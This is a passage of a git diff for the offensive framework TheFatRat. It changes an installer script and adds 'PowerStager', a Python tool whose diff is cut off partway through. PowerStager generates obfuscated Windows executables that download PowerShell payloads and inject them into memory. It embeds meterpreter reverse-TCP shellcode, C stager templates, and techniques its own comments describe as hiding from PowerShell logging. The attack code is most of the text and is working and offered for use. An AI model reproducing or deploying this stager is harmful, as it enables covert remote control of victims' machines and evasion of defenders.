manually") -minpc=$(zenity --entry --title="Searchsploit Path Manual Input" --width=100 --height=100 --text="Write the location of your Searchsploit Path?" --entry-text="/opt/searchsploit/searchsploit"); -ret=$? - -if [ $ret = "0" ]; then -echo "bash $minpc" | tee -a $config $log > /dev/null 2>&1 +echo -e $red "[ x ] Dex2Jar 2.0" +echo "0" > $stp fi - -if [ $ret = "1" ]; then -echo "searchsploit" | tee -a $config $log > /dev/null 2>&1 -fi -;; - -"Install Searchsploit from Repository") -echo -e $yellow "[ ! ] Installing searchsploit " -xterm -T "☣ INSTALL SEARCHSPLOIT ☣" -geometry 100x30 -e "sudo apt-get install exploitdb --force-yes -y" -echo -e $green "[ ✔ ] Done installing ...." -echo "searchsploit" | tee -a $config $log > /dev/null 2>&1 -sleep 2 -echo "" -echo -e $green "Configuration and tool installed with success!"; -sleep 2 -;; - -"Use default config") -echo "searchsploit" | tee -a $config $log > /dev/null 2>&1 -;; -esac fi +mtspl ################################ # rebackyo repo @@ -728,20 +784,27 @@ rm -f /etc/apt/sources.list.fatrat apt-get clean xterm -T "☣ UPDATE YOUR REPO ☣" -geometry 100x30 -e "sudo apt-get update " clear +echo -e $okegreen "Do you want to create a shortcut for fatrat in your system" +echo -e $okegreen "so you can run fatrat from anywhere in your terminal ?" +echo "" +echo -ne $cyan "Choose y/n : " +read cho +case $cho in -zenity --width=100 --height=100 --no-wrap --title="FatRat Shorcut Creation" --question --ok-label="Yes" --cancel-label="No" --text="`printf "Do you wish to create a fatrat shortcut in your system path ? \n So you can call fatrat from anywhere in terminal ."`"; +y|Y|Yes|yes|YES) lnk=$? if [ $lnk == "0" ];then dir=`pwd` scrp="cd $dir && ./fatrat" -rm -f /usr/local/sbin/fatrat >/dev/null 2>&1 -touch /usr/local/sbin/fatrat >/dev/null 2>&1 +rm -f /usr/local/sbin/fatrat +touch /usr/local/sbin/fatrat echo "#!/bin/bash" > /usr/local/sbin/fatrat echo $scrp >> /usr/local/sbin/fatrat chmod +x /usr/local/sbin/fatrat chmod +x fatrat chmod +x update chmod +x backdoor_apk +chmod +x $path/tools/power.py chmod +x $path/tools/android-sdk/zipalign chmod +x $path/tools/proguard5.3.2/lib/proguard chmod +x $path/tools/android-sdk/dx @@ -749,22 +812,245 @@ chmod +x $path/tools/android-sdk/aapt chmod +x $path/tools/apktool2.2.2/apktool which fatrat >> $log 2>&1 clear -zenity --info --width=100 --height=100 --no-wrap --text="FatRat shorcut created , write (fatrat) anywhere in terminal to open it ." -sleep 2 -echo -e $green "Instalation completed" -exit +echo "" +echo -e $green "Instalation completed , To execute fatrat write anywhere in your terminal (fatrat)" fi -if [ $lnk == "1" ];then +;; + +n|no|No|NO) chmod +x fatrat chmod +x update chmod +x backdoor_apk +chmod +x $path/tools/power.py chmod +x $path/tools/android-sdk/zipalign chmod +x $path/tools/proguard5.3.2/lib/proguard chmod +x $path/tools/android-sdk/dx chmod +x $path/tools/android-sdk/aapt chmod +x $path/tools/apktool2.2.2/apktool -zenity --width=100 --height=100 --no-wrap --info --text="To execute fatrat write in fatrat directory (./fatrat) to execute it." -sleep 2 -echo -e $green "Instalation completed" +clear +echo "" +echo -e $green "Instalation completed , To execute fatrat write in fatrat directory (./fatrat)" +;; + +*) +chmod +x fatrat +chmod +x update +chmod +x backdoor_apk +chmod +x $path/tools/power.py +chmod +x $path/tools/android-sdk/zipalign +chmod +x $path/tools/proguard5.3.2/lib/proguard +chmod +x $path/tools/android-sdk/dx +chmod +x $path/tools/android-sdk/aapt +chmod +x $path/tools/apktool2.2.2/apktool +clear +echo "" +echo -e $green "Instalation completed , To execute fatrat write in fatrat directory (./fatrat)" +;; +esac +exit + +} + +function chknet() { +echo -e $red "[X] Your Internet is not working correctly!" +sleep 1 +echo -e $cyan "[*] Checking ...." +ping -c 1 8.8.4.4 > /dev/null 2>&1 +png="$?" + if [ $png == "0" ] +then + echo -e $red "[X] Your linux OS is not able to resolve" + echo -e $red "hostnames over terminal using ping !!" + echo "" + echo -e $yellow "Search on the web : (unable to resolve hostnames ping) to find a solution" +echo "" +echo -e $green "Setup will continue , but is not garantee that apt package management +may work properly , or even if it can resolve hostnames ." +echo "" +echo -e $cyan "Setup will continue because :" +echo -e $green "Ping google.com =$red Failed" +echo -e $green "Ping google DNS = Success" +echo "" +echo -e $green "Press [ENTER] key to continue" +read continue +cont + sleep 1 +elif [ $png == "1" ] +then + echo -e $yellow "You are connected to your local network but not to the web ." + echo -e $yellow "Check if your router/modem gateway is connected to the web ." +echo "" +echo -e $green "Setup will not continue , you are only connected to your local lan." +echo "" +echo -e $cyan "Setup will stop because :" +echo -e $green "Ping google.com =$red Failed" +echo -e $green "Ping google DNS =$red Failed" +echo "" +echo -e $green "Press [ENTER] key to continue" +read continue +exit 1 +sleep 1 +elif [ $png == "2" ] +then +echo -e $red "You are not connected to any network ." +echo "" +echo -e $cyan "Setup will stop because :" +echo -e $green "Ping google.com =$red Failed" +echo -e $green "Ping google DNS =$red Failed" +echo "" +echo -e $green "Press [ENTER] key to continue" +read continue +exit 1 + sleep 1 +fi +} + +# setup.sh Original Author : Edo maland ( Screetsec ) +# Script rebuilded by peterpt +# Install all dependencies nedded +# configuration all file for fixing all problems +# -------------------------------------------------------- + + +#Fail safe for original user sources.list in case setup was interrupted in middle last time +file="/etc/apt/sources.list.fatrat" +if [ -f "$file" ] +then +echo "Setup Detected that your previous run was interrupted in middle , fixing your original repositories list ." +sleep 4s +rm -f /etc/apt/sources.list +mv /etc/apt/sources.list.fatrat /etc/apt/sources.list +echo "Your Original repository list was recovered. ;) ..... beginning setup" +echo "" +echo "Cleaning previous repositories cache & updating your repository ." +sudo apt-get clean && apt-get update -y +sleep 2 +else +echo "" +fi +path=`pwd` +arch=`uname -m` +log=$path/logs/setup.log +config=$path/config/config.path +fail=$path/logs/failsetup.log +cfg=$path/config/config.path +#Removing any previous setup log created +rm -rf $log > /dev/null 2>&1 +rm -rf logs/check > /dev/null 2>&1 + +#This colour +cyan='\e[0;36m' +green='\e[0;32m' +lightgreen='\e[0;32m' +white='\e[0;37m' +red='\e[0;31m' +yellow='\e[0;33m' +blue='\e[0;34m' +purple='\e[0;35m' +orange='\e[38;5;166m' +path=`pwd` + +#Check root dulu +if [ $(id -u) != "0" ]; then +echo -e $red [x]::[not root]: You need to be [root] to run this script.; + echo "" + sleep 1 +exit 0 +fi +echo "" +echo -e $green "[ * ] Fixing any possible broken packages in apt management" +sleep 1 +sudo apt-get install -f -y && sudo apt-get autoremove -y +sleep 1 +echo "[ ✔ ] Done ! ....Proceeding with setup" +sleep 2 +resize -s 80 103 > /dev/null 2>&1 +clear +rm -rf $fail >/dev/null 2>&1 +touch $fail +#Banner dong biar keren +echo -e $green "" +echo "___________ __ __________ __ " +echo "\_ _____/_____ _/ |_\______ \_____ _/ |_ " +echo " | __) \__ \ \ __\| _/\__ \ \ __\ " +echo " | \ / __ \_| | | | \ / __ \_| | " +echo " \___ / (____ /|__| |____|_ /(____ /|__| " +echo " \/ \/ \/ \/ " +echo " ____ ________ " +echo " /_ | / __ \ " +echo " | | \____ / " +echo " | | / / " +echo " |___| /\ /____/ " +echo " \/ " +echo "" +echo -e $blue " Setup Script for FATRAT 1.9.4 " +touch $log +echo "------------------------------------------------------" >> $log +echo "| Tools paths configured in (setup.sh) for TheFatRat |" >> $log +echo "------------------------------------------------------" >> $log +echo " " >> $log +echo "" +case $arch in +x86_64|aarch64) +echo -e $purple " 64Bit OS detected" +echo "" +;; +i386|i486|i586|i686|armv7l) +echo -e $blue " 32Bit OS detected" +echo "" +;; +*) +echo -e $red "Setup will not proceed because none of these archs were detected" +echo "" +echo -e $blue "x86_64|i386|i486|i586|i686|aarch64|armv7l" +echo "" +echo -e $green "Report this arch: $blue $arch $green into fatrat issues on github" +echo "" +echo -e "Press any key to continue" +read abor +exit 0 +;; +esac +echo -e $green "Checking type of shell ...." +sleep 1 + +#Check if user is using a remote shell or a local terminal +if [ -n "$SSH_CLIENT" ] || [ -n "$SSH_TTY" ]; then + echo "[remote]" +echo "" + echo -e $red "Fatrat & Setup does not work over a remote secure shell ." + echo "" +echo -e $green "If you want to Install Fatrat on a remote computer then " +echo -e $green "use a remote desktop connection like (rdesktop) or (vnc) " +echo "" +echo -e $green "Press [ENTER] key to exit" +read abor +exit 1 +else +echo [local] + case $(ps -o comm= -p $PPID) in + sshd|*/sshd) SESSION_TYPE=remote/ssh;; + esac +fi + +sleep 1 +echo -e $green "[ * ] Checking for internet connection" +sleep 1 +ping -c 1 google.com > /dev/null 2>&1 +png="$?" + if [ $png == "0" ] +then + echo -e $green [ ✔ ]::[Internet Connection]: CONNECTED!; + sleep 1 + cont +elif [ $png == "1" ] +then + echo -e $yellow [ X ]::[Internet Connection]: LOCAL ONLY!; + chknet + sleep 1 +elif [ $png == "2" ] +then +echo -e $red [ X ]::[Internet Connection]: OFFLINE!; +chknet + sleep 1 fi -exit diff --git a/tools/power.py b/tools/power.py new file mode 100755 index 0000000..f8069c6 --- /dev/null +++ b/tools/power.py @@ -0,0 +1,879 @@ +#!/usr/bin/env python3 +import os +import sys +import getopt +import string +import random +import base64 +import hashlib + +# Help notes and description +help_notes = """ + PowerStager 0.2 + --------------- + Created by: z0noxz + https://github.com/z0noxz/powerstager + + Description: + This script creates an executable stager that downloads a selected powershell + payload, loads it into memory and executes it using obfuscated EC methods. + The script will also encrypt the stager for dynamic signatures and some + additional obfuscation. + + This enables the actual payload to be executed indirectly without the victim + downloading it, only by executing the stager. The attacker can then for + example implement evasion techniques on the web server, hosting the payload, + instead of in the stager itself. + + Additional methods allows the payload to be embedded into the 'stager' and + temporarily stored encrypted on disk for memory injection. + + Not only are powershell powerful when managing Windows, it's also powerful + when exploiting Windows. This script exploits multiple Windows features such + as its inherit trust of powershell, interpretation of shorthand syntaxes, + code evaluation and more... + + Program dependencies: + * i686-w64-mingw32-gcc ([_CHECK_i686_]) + * x86_64-w64-mingw32-gcc ([_CHECK_x86_64_]) + + Usage: powerstager [options] + + Options: + -h, --help Show this help message and exit. (duh) + + Method: + One of these options has to be provided to define the method + -u, --url=URL Payload URL for online staging + -p, --path=PATH Payload path for embedded staging + -m, --meterpreter embedded meterpreter staging (reverse_tcp) + \033[96m--path and --meterpreter will dump\033[0m + \033[96mthe payload to disk temporary\033[0m + + Mandatory: + -o, --output=PATH File output for generated executable + -t, --target=NAME Platform target win32/win64 + + Meterpreter: + Mandatory options if the meterpreter method is selected, otherwise ignored + --lhost=LHOST Listener host IP address (e.g. 13.37.13.37) + --lport=LPORT Listener port (e.g. 4444) + + Optional: + --listener Automatically starts a meterpreter listener + -g, --generate Only outputs the --url ready payload + -e, --use-elevation Implementation of privilage elevation (using UAC) + \033[96melevation only works with --url\033[0m + + Note: + \033[91mAll powershell activity will be logged in Windows event log.\033[0m +""" + +# Placeholder values for powershell blocks with obfuscation techniques +obfuscation = { + "[_OBF_NEW_OBJECT_]" : "&(`G`C`M *w-O*)", + "[_OBF_ADD_TYPE_]" : "&(`G`C`M *d-T*e)", + "[_OBF_SLEEP_]" : "&(`G`C`M sl*p)", + "[_OBF_WEB_CLIENT_]" : { + "text" : "net.webclient", + "escapable" : True, + "string" : True + }, + "[_OBF_DOWNLOAD_STRING_]" : { + "text" : "downloadstring", + "escapable" : True, + "string" : True + }, + "[_OBF_CHAR_]" : { + "text" : "char", + "escapable" : False, + "string" : False + }, + "[_OBF_BYTE_]" : { + "text" : "byte", + "escapable" : False, + "string" : False + }, + "[_OBF_VOID_]" : { + "text" : "void", + "escapable" : False, + "string" : False + }, + "[_OBF_INTPTR_]" : { + "text" : "intptr", + "escapable" : False, + "string" : False + }, + "[_OBF_JOIN_]" : { + "text" : "join", + "escapable" : False, + "string" : False + }, + "[_OBF_BXOR_]" : { + "text" : "bxor", + "escapable" : False, + "string" : False + }, + "[_OBF_SV_]" : { + "text" : "sv", + "escapable" : True, + "string" : False + }, + "[_OBF_GV_]" : { + "text" : "gv", + "escapable" : True, + "string" : False + }, + "[_OBF_VALUE_]" : { + "text" : "value", + "escapable" : True, + "string" : True + }, + "[_OBF_LENGTH_]" : { + "text" : "length", + "escapable" : True, + "string" : True + }, + "[_OBF_START_]" : { + "text" : "start", + "escapable" : True, + "string" : False + }, + "[_OBF_TO_STRING_]" : { + "text" : "tostring", + "escapable" : True, + "string" : True + }, + "[_OBF_TO_B64_STRING_]" : { + "text" : "tobase64string", + "escapable" : True, + "string" : True + }, + "[_OBF_UNICODE_]" : { + "text" : "unicode", + "escapable" : True, + "string" : True + }, + "[_OBF_GET_BYTES_]" : { + "text" : "getbytes", + "escapable" : True, + "string" : True + }, + "[_OBF_AS_]" : { + "text" : "as", + "escapable" : False, + "string" : False + }, + "[_OBF_POWERSHELL_]" : { + "text" : "powershell", + "escapable" : True, + "string" : False + }, + "[_OBF_VIRTUAL_ALLOC_]" : { + "text" : "virtualalloc", + "escapable" : True, + "string" : True + }, + "[_OBF_MAX_]" : { + "text" : "max", + "escapable" : True, + "string" : True + }, + "[_OBF_MEMSET_]" : { + "text" : "memset", + "escapable" : True, + "string" : True + }, + "[_OBF_CREATE_THREAD_]" : { + "text" : "createthread", + "escapable" : True, + "string" : True + }, +} + +# Normal C source for decryption and process execution through system() call +c_source = """#include + +int main(int argc, char *argv[]) +{ + int [_VAR_X_]; + char [_VAR_STR_][] = {[_VAL_STR_]}; + char [_VAR_KEY_][] = {[_VAL_KEY_]}; + for ([_VAR_X_] = 0; [_VAR_X_] < sizeof([_VAR_STR_]) / sizeof([_VAR_STR_][0]); [_VAR_X_]++) + { + [_VAR_STR_][[_VAR_X_]] = [_VAR_STR_][[_VAR_X_]] ^ [_VAR_KEY_][[_VAR_X_] % sizeof([_VAR_KEY_])]; + } + + system([_VAR_STR_]); + + return 0; +} +""" + +# C source for XOR decryption and process execution of embedded code through system() call +c_source_embedded = """#define _CRT_SECURE_NO_DEPRECATE +#include +#include + +int main(int argc, char *argv[]) +{ + int [_VAR_X_]; + char [_VAR_PATH_][256]; + const char* [_VAR_TEMP_] = getenv("TEMP"); + snprintf([_VAR_PATH_], 255, "%s\\\\[_TMP_FILENAME_]", [_VAR_TEMP_]); + + FILE *[_VAR_FILE_] = fopen([_VAR_PATH_], "wb"); + if ([_VAR_FILE_] == NULL) { exit(1); } + + char [_VAR_STR_EMB_][] = {[_VAL_STR_EMB_]}; + char [_VAR_KEY_EMB_][] = {[_VAL_KEY_EMB_]}; + for ([_VAR_X_] = 0; [_VAR_X_] < sizeof([_VAR_STR_EMB_]) / sizeof([_VAR_STR_EMB_][0]); [_VAR_X_]++) + { + [_VAR_STR_EMB_][[_VAR_X_]] = [_VAR_STR_EMB_][[_VAR_X_]] ^ [_VAR_KEY_EMB_][[_VAR_X_] % sizeof([_VAR_KEY_EMB_])]; + } + + fwrite([_VAR_STR_EMB_], 1, sizeof([_VAR_STR_EMB_]), [_VAR_FILE_]); + fclose([_VAR_FILE_]); + + char [_VAR_STR_STG_][] = {[_VAL_STR_STG_]}; + char [_VAR_KEY_STG_][] = {[_VAL_KEY_STG_]}; + for ([_VAR_X_] = 0; [_VAR_X_] < sizeof([_VAR_STR_STG_]) / sizeof([_VAR_STR_STG_][0]); [_VAR_X_]++) + { + [_VAR_STR_STG_][[_VAR_X_]] = [_VAR_STR_STG_][[_VAR_X_]] ^ [_VAR_KEY_STG_][[_VAR_X_] % sizeof([_VAR_KEY_STG_])]; + } + + system([_VAR_STR_STG_]); + + return 0; +} +""" + +# Fairly obfuscated building blocks for powershell commands +powershell_blocks = { + # The main part of the powershell blocks + "main" : "powershell -wi h -c \"[_OBF_START_] [_OBF_POWERSHELL_][_ELEVATION_] -wi h -a '-wi h -c \"\"[_PS_LOAD_]\"\"'\"", + + # Base64 decoder + "base64decoder" : "([Convert]::[_OBF_TO_B64_STRING_]([Text.Encoding]::[_OBF_UNICODE_].[_OBF_GET_BYTES_]([_PS_LOAD_])))", + + # XOR decryptor for file decryption + "xordecryptor" : "([[_OBF_CHAR_][]](([[_OBF_CHAR_][]][_PS_LOAD_])|%{$[_PS_XOR_I_]=0}{$_-[_OBF_BXOR_]'[_PS_XOR_KEY_]'[$[_PS_XOR_I_]++%[_PS_XOR_KEY_SIZE_]]})-[_OBF_JOIN_]'')", + + # System.Net.WebClient invoker + "webclient" : "([_OBF_NEW_OBJECT_][_OBF_WEB_CLIENT_]).[_OBF_DOWNLOAD_STRING_]([_URL_])", + + # Encoded command block or EC + "ec" : "[_OBF_SV_] [_PS_VAR_1_] [_PS_VAR_C45_A_];[_OBF_SV_] [_PS_VAR_2_] [_PS_VAR_C101_A_];[_OBF_SV_] [_PS_VAR_3_] [_PS_VAR_C99_A_];[_OBF_SV_] [_PS_VAR_4_](((([_OBF_GV_] [_PS_VAR_1_]).[_OBF_VALUE_]+[_PS_VAR_C45_B_])-[_OBF_AS_][[_OBF_CHAR_]]).[_OBF_TO_STRING_]()+((([_OBF_GV_] [_PS_VAR_2_]).[_OBF_VALUE_]+[_PS_VAR_C101_B_])-[_OBF_AS_][[_OBF_CHAR_]]).[_OBF_TO_STRING_]()+((([_OBF_GV_] [_PS_VAR_3_]).[_OBF_VALUE_]+[_PS_VAR_C99_B_])-[_OBF_AS_][[_OBF_CHAR_]]).[_OBF_TO_STRING_]());[_OBF_POWERSHELL_]([_OBF_GV_] [_PS_VAR_4_]).[_OBF_VALUE_].[_OBF_TO_STRING_]()[_PS_LOAD_]", + + # Memory injection block + "injection" : "IEX \"`$[_PS_WF_]=[_OBF_ADD_TYPE_] -m '[DllImport(`\"kernel32.dll`\")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport(`\"kernel32.dll`\")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport(`\"msvcrt.dll`\")] public static extern IntPtr memset(IntPtr dest, uint src, uint count);' -name 'Win32' -ns Win32Functions -pas;[[_OBF_BYTE_][]]`$[_PS_VAR_PAYLOAD_]=[_PS_PAYLOAD_];`$[_PS_VAR_X_]=`$[_PS_WF_]::[_OBF_VIRTUAL_ALLOC_](0,[Math]::[_OBF_MAX_](`$[_PS_VAR_PAYLOAD_].[_OBF_LENGTH_],0x1000),0x3000,0x40);for(`$[_PS_VAR_I_]=0;`$[_PS_VAR_I_] -le (`$[_PS_VAR_PAYLOAD_].[_OBF_LENGTH_]-1);`$[_PS_VAR_I_]++){[[_OBF_VOID_]]`$[_PS_WF_]::[_OBF_MEMSET_]([[_OBF_INTPTR_]](`$[_PS_VAR_X_].ToInt[_PS_ARCHITECTURE_]()+`$[_PS_VAR_I_]),`$[_PS_VAR_PAYLOAD_][`$[_PS_VAR_I_]],1)};`$[_PS_WF_]::[_OBF_CREATE_THREAD_](0,0,`$[_PS_VAR_X_],0,0,0);[_OBF_SLEEP_]100000\"" +} + +# Payloads prepared for memory injection +powershell_payloads = { + # metasploit stager for meterpreter. This also works with vncinjection on W7 (but fails on W10) + "meterpreter" : "0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51," + + "0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52," + + "0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0," + + "0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed," + + "0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x66,0x81,0x78," + + "0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,0x80,0x88,0x00,0x00,0x00,0x48," + + "0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49," + + "0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31," + + "0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1," + + "0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49," + + "0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b," + + "0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59," + + "0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b," + + "0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00," + + "0x00,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5," + + "0x49,0xbc,0x02,0x00,[_LPORT_]," + "[_LHOST_]" + ",0x41,0x54,0x49,0x89,0xe4,0x4c," # << LPORT and LHOST gets declared here as 6 bytes + + "0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,0x68,0x01,0x01," + + "0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x41,0x5e,0x50," + + "0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0," + + "0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10," + + "0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5," + + "0x85,0xc0,0x74,0x0c,0x49,0xff,0xce,0x75,0xe5,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5," + + "0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x04,0x41,0x58,0x48,0x89," + + "0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6," + + "0x6a,0x40,0x41,0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31," + + "0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d," + + "0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8," + + "0x5f,0xff,0xd5,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xe1,0x41,0xff," + + "0xe7", +} + +# Collision list for dynamic variable creation +collision_list = [] + + +# Class for printing and styling text to terminal +class Print(object): + + name_value_list = [] + + @staticmethod + def text(text="", continuous=False): + if continuous: + sys.stdout.write(" " + text) + sys.stdout.flush() + else: + print(" " + text) + return len(text) + + @staticmethod + def info(text="", continuous=False): + return Print.text("\033[94m[i]\033[0m " + text, continuous) + + @staticmethod + def warning(text="", continuous=False): + return Print.text("\033[96m[!]\033[0m " + text, continuous) + + @staticmethod + def status(text="", continuous=False): + return Print.text("\033[94m[*]\033[0m " + text, continuous) + + @staticmethod + def error(text="", continuous=False): + return Print.text("\033[91m[-]\033[0m " + text, continuous) + + @staticmethod + def success(text="", continuous=False): + return Print.text("\033[92m[+]\033[0m " + text, continuous) + + @staticmethod + def add_name_value(name="", value="", func=None): + Print.name_value_list.append({"name": name, "value": value, "func": func}) + + @staticmethod + def name_value_print(): + for line in Print.name_value_list: + (line["func"] if line["func"] is not None else Print.text)(line["name"] + (" " * (len(max(Print.name_value_list, key=lambda x: len(x["name"]))["name"]) - len(line["name"]) + 4)) + ": " + line["value"]) + Print.name_value_list = [] + + +# Checks if program is installed and executable +def which(program): + + def is_exe(fpath): + return os.path.isfile(fpath) and os.access(fpath, os.X_OK) + + fpath, fname = os.path.split(program) + if fpath: + if is_exe(program): + return program + else: + for path in os.environ["PATH"].split(os.pathsep): + path = path.strip('"') + exe_file = os.path.join(path, program) + if is_exe(exe_file): + return exe_file + + return None + + +# Integer to binary converter +def binarray(n): + while n: + yield n & 0xff + n = n >> 8 + + +# Creates dynamic variable names while checking for name collisions +def dynamic_variable(): + global collision_list + + holder = "" + + while holder == "" or holder in collision_list: + holder = "_" + "".join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for x in range(random.randint(6, 12))) + + collision_list.append(holder) + return holder + + +# Binary formater for lhost & lport in meterpreter injection +def _lformat(lhost, lport): + try: + lhost = lhost.split(".") + lhost = [int(byte) for byte in lhost] + lhost = [byte for byte in lhost if byte >= 0 and byte <= 255] + lport = int(lport) + if len(lhost) == 4 and lport > 0 and lport <= 65535: + return ",".join(hex(b) for b in (list(binarray(lport))[::-1] + list(binarray(lhost[0])) + list(binarray(lhost[1])) + list(binarray(lhost[2])) + list(binarray(lhost[3])))) + except: + Print.error("There is something wrong with the LHOST and LPORT") + sys.exit(2) + + +# Compiler for c-source +def compile(source, output, target): + + temp_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(10)) + ".c" + + with open(temp_name, "w") as temp_file: + temp_file.write(source) + + if ( + target == "win32" + and (os.system("i686-w64-mingw32-gcc -mwindows -o " + output + " " + temp_name + " && /bin/rm -f " + temp_name) == 0) + ) or ( + target == "win64" + and (os.system("x86_64-w64-mingw32-gcc -mwindows -o " + output + " " + temp_name + " && /bin/rm -f " + temp_name) == 0) + ): + Print.add_name_value("File signature", hashlib.md5(open(output, "rb").read()).hexdigest(), Print.info) + Print.add_name_value("Payload generated", output, Print.success) + return + + Print.add_name_value("Failed to generate", output, Print.error) + os.system("/bin/rm -f " + temp_name) + + +# Powershell ready base64 encoder +def ps_base64encode(data): + return base64.b64encode(data.encode("UTF-16LE")).decode("utf-8", "ignore") + + +# Replaces nth occurrence (maybe overkill as the only call is for first occurrence) +def replaceNth(subject, source, target, n): + indices = [index for index in range(len(subject) - len(source) + 1) if subject[index:index + len(source)] == source] + if len(indices) < n: + return subject + subject = list(subject) + subject[indices[n - 1]:indices[n - 1] + len(source)] = target + return ''.join(subject) + + +# Obfuscates powershell code in accordance with some standard rules +def ps_obf(data, top=False, escape_quotes=False): + global obfuscation + + clone = data + for key, value in obfuscation.items(): + if (type(value) is dict): + while clone.count(key) > 0: + sub = list(value["text"]) + + for i in range(len(sub)): + if random.getrandbits(1): + sub[i] = sub[i].upper() + + if (value["escapable"] and value["string"] and not top) or (value["escapable"] and not value["string"]): + if random.getrandbits(1): + if sub[i] in ["a", "b", "f", "n", "r", "t", "v"]: + sub[i] = sub[i].upper() + sub[i] = "`" + sub[i] + + sub = "".join(sub) + + if value["string"] and not top: + sub = "(\"" + sub + "\")" + + # Used inside injection payloads + if escape_quotes: + sub = sub.replace("`", "``") + sub = sub.replace("\"", "`\"") + + clone = replaceNth(clone, key, sub, 0) + else: + clone = clone.replace(key, value) + + return "".join(clone) + + +# Generates main powershell block +def gen_main(load, elevation=False): + global powershell_blocks + + return ps_obf(powershell_blocks["main"]).replace( + "[_ELEVATION_]", (" -v runas" if elevation else "") + ).replace( + "[_PS_LOAD_]", load + ) + + +# Generates EC (EncodedCommand) powershell block, with some extra obfuscation totally avoiding "-EC" +# However, I have noticed the powershell engine still interpreting this as -EC... so not 100% stealthy +def gen_ec(load, top=False): + global powershell_blocks + + c45 = random.randint(0, 45) + c101 = random.randint(0, 101) + c99 = random.randint(0, 99) + + return ps_obf(powershell_blocks["ec"], top).replace( + "[_PS_VAR_1_]", dynamic_variable() + ).replace( + "[_PS_VAR_2_]", dynamic_variable() + ).replace( + "[_PS_VAR_3_]", dynamic_variable() + ).replace( + "[_PS_VAR_4_]", dynamic_variable() + ).replace( + "[_PS_VAR_C45_A_]", str(c45) + ).replace( + "[_PS_VAR_C45_B_]", str(45 - c45) + ).replace( + "[_PS_VAR_C101_A_]", str(c101) + ).replace( + "[_PS_VAR_C101_B_]", str(101 - c101) + ).replace( + "[_PS_VAR_C99_A_]", str(c99) + ).replace( + "[_PS_VAR_C99_B_]", str(99 - c99) + ).replace("[_PS_LOAD_]", load) + + +# Generates base64 decoder powershell block +# The idea is that this + EC will simulate an (IEX + webclient) call +# without calling the IEX at all... so looking for IEX in the logs won't help you here +def gen_base64_decoder(url): + global powershell_blocks + + return gen_ec( + ps_obf(powershell_blocks["base64decoder"]).replace( + "[_PS_LOAD_]", gen_webclient("+".join("'" + x + "'" for x in url)) + ) + ) + + +# Generates XOR decryptor powershell block +# This is used for all payloads being temporary stored on disk +def gen_xor_decryptor(url, key): + global powershell_blocks + + return ps_obf(powershell_blocks["xordecryptor"]).replace( + "[_PS_LOAD_]", gen_webclient(url) + ).replace( + "[_PS_XOR_I_]", dynamic_variable() + ).replace( + "[_PS_XOR_KEY_]", key + ).replace( + "[_PS_XOR_KEY_SIZE_]", str(len(key)) + ) + + +# Generates webclient powershell block +def gen_webclient(url): + global powershell_blocks + + return ps_obf(powershell_blocks["webclient"]).replace("[_URL_]", url) + + +# Generates memory injection powershell block +# Used for example with injection of a meterpreter stager into memory +def gen_injection(payload, architecture): + global powershell_blocks + + return ps_obf(powershell_blocks["injection"], False, True).replace( + "[_PS_MEMB_]", + 